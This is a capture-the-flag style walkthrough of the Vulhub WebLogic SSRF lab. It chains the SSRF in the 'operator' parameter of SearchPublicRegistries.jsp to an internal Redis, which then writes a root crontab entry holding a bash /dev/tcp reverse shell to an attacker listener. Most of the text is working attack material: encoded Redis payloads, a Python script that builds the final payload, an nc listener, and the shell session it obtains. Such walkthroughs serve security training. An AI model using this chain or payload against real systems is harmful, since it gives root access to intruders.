Environment setup
vulhub:/vulhub-master/weblogic/ssrf
1. Start the target
[root@localhost ssrf]# docker-compose up -d
Starting ssrf_redis_1 ... done
Starting ssrf_weblogic_1 ... done
2. Check the ports
[root@localhost ssrf]# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
6ef6868dbbb9 vulhub/weblogic:10.3.6.0-2017 "startWebLogic.sh" 26 hours ago Up About a minute 5556/tcp, 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp ssrf_weblogic_1
86f083e195f6 vulhub/baselinux:centos-6 "/docker-entrypoint...." 26 hours ago Up About a minute 6379/tcp ssrf_redis_1
3. Get the Redis internal IP (172.22.0.2)
docker exec -it <container ID> ifconfig
[root@localhost ssrf]# docker exec -it 86f083e195f6 ifconfig
eth0 Link encap:Ethernet HWaddr 02:42:AC:16:00:02
inet addr:172.22.0.2 Bcast:172.22.255.255 Mask:255.255.0.0
4. Visit the vulnerable page
http://192.168.10.5:7001/uddiexplorer/SearchPublicRegistries.jsp
Exploitation
1. Turn on the Burp proxy
2. Enter anything in the form, submit it, and capture the request in Burp
The vulnerable parameter is operator
3. Replace the parameter value to probe whether the port is open
operator=http://172.22.0.2:6379/
Check the response body:
An error has occurred<BR>
weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://172.22.0.2:6379/ which did not have a valid SOAP content-type: null.
4. Write the payload
set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.10.128/7777 0>&1' \n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
The four \n escapes on either side of the cron entry become real newlines when Redis parses the double-quoted inline argument, so the entry lands on a line of its own between the binary RDB header and trailer that end up in /etc/crontab. The fields 0-59 0-23 1-31 1-12 0-6 are just an explicit way of writing * * * * *, so the shell is spawned every minute. The trick relies on crond skipping the unparsable binary lines, which the CentOS 6 cron in this image does; on Debian-derived systems cron typically discards the whole file on the first syntax error, so the same dump fails there.
5. URL-encode it
Using encodeURIComponent (which leaves ' and - unencoded). Note the %0A between %3E%26 and %2Fdev in the output below: it is the line break where the payload wrapped when it was pasted in step 4, not part of the command, and it is turned back into a space (%20) in step 7.
set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%0A%2Fdev%2Ftcp%2F192.168.10.128%2F7777%200%3E%261'%20%5Cn%5Cn%5Cn%5Cn%22%20config%20set%20dir%20%2Fetc%2F%0Aconfig%20set%20dbfilename%20crontab%0Asave
6. Replace every newline in the encoded output
Redis inline commands are terminated by \r\n, so replace %0A with %0D%0A.
Save the command in a txt file, select the text and use Ctrl+H to replace.
After replacement:
set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%0D%0A%2Fdev%2Ftcp%2F192.168.10.128%2F7777%200%3E%261'%20%5Cn%5Cn%5Cn%5Cn%22%20config%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave
7. Add the framing around the reworked payload
Final payload:
Compared with the step 6 output, the highlighted parts were changed as follows: a dummy path test%0D%0A%0D%0A is placed right after the port so that the GET request line Redis receives ends on its own line (a junk command it rejects before reading the real ones), the %0D%0A inside the bash command (between %3E%26 and %2Fdev) is restored to %20, the space between the closing %22 and config is replaced by %0D%0A so that config set dir starts a new command, and a trailing %0D%0Alalala absorbs the " HTTP/1.1" that WebLogic appends to the request line.
operator=http://172.22.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.10.128%2F7777%200%3E%261'%20%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0Alalala
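To make steps 4 to 7 reproducible without the manual encode-and-replace round trips, here is an added Python script (not part of the original write-up) that builds the same operator value from its parts and then decodes it again to show the exact lines Redis will read. The Redis address, the listener address and the listener port are the lab values above and are assumptions for any other environment.

```python
"""Build the WebLogic SSRF -> Redis crontab payload programmatically.

Added example, not code from the original write-up. The IPs and ports are
the lab values from the write-up and are assumptions for any other setup.
"""
from urllib.parse import quote, unquote

# Characters that JavaScript's encodeURIComponent leaves unencoded. The
# write-up used that encoder, which is why ' and - survive in its payload.
JS_SAFE = "-_.!~*'()"


def encode_uri_component(s: str) -> str:
    """Percent-encode like encodeURIComponent (space -> %20, / -> %2F, " -> %22)."""
    return quote(s, safe=JS_SAFE)


def cron_entry(listener: str, listener_port: int) -> str:
    """Every-minute root crontab line carrying the bash reverse shell."""
    shell = f"sh -i >& /dev/tcp/{listener}/{listener_port} 0>&1"
    return f"0-59 0-23 1-31 1-12 0-6 root bash -c '{shell}'"


def redis_commands(listener: str, listener_port: int) -> list:
    """Inline Redis commands. The value is padded with literal \\n escapes;
    Redis' inline parser turns them into newlines, so the cron line sits on
    its own line inside the binary RDB dump written to /etc/crontab."""
    pad = "\\n" * 4  # four literal backslash-n sequences, as in the write-up
    return [
        f'set 1 "{pad}{cron_entry(listener, listener_port)} {pad}"',
        "config set dir /etc/",
        "config set dbfilename crontab",
        "save",
    ]


def build_payload(redis_host: str, redis_port: int,
                  listener: str, listener_port: int) -> str:
    """Full operator= value: commands joined by CRLF and framed so that the
    'GET /test' request line and the trailing ' HTTP/1.1' fall on junk lines
    that Redis rejects without affecting the real commands."""
    body = "%0D%0A".join(encode_uri_component(c)
                         for c in redis_commands(listener, listener_port))
    return (f"operator=http://{redis_host}:{redis_port}/test%0D%0A%0D%0A"
            f"{body}%0D%0Alalala")


def redis_inline_lines(payload: str) -> list:
    """Decode the path part of the payload and split on CRLF to see each
    inline command exactly as Redis will read it. A stray %0A left inside the
    bash command (the step 6 mistake) shows up here as an extra broken line."""
    path = payload.split("/", 3)[3]  # everything after http://host:port/
    return unquote(path).split("\r\n")


if __name__ == "__main__":
    p = build_payload("172.22.0.2", 6379, "192.168.10.128", 7777)
    print(p)
    for ln in redis_inline_lines(p):
        print(repr(ln))
```

Running it prints the payload and then the decoded lines; the set command must appear as exactly one line in that listing, which is the check that catches a line break from a wrapped paste before the request is ever sent.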
8. Listen on port 7777
nc -lvp 7777
9. Send the request to trigger the reverse shell
Connection established:
┌──(root㉿kali)-[~]
└─# nc -lvp 7777
listening on [any] 7777 ...
192.168.10.5: inverse host lookup failed: Unknown host
connect to [192.168.10.128] from (UNKNOWN) [192.168.10.5] 35496
sh: no job control in this shell
sh-4.1#
sh-4.1# ls
ls
anaconda-ks.cfg
install.log
install.log.syslog
sh-4.1#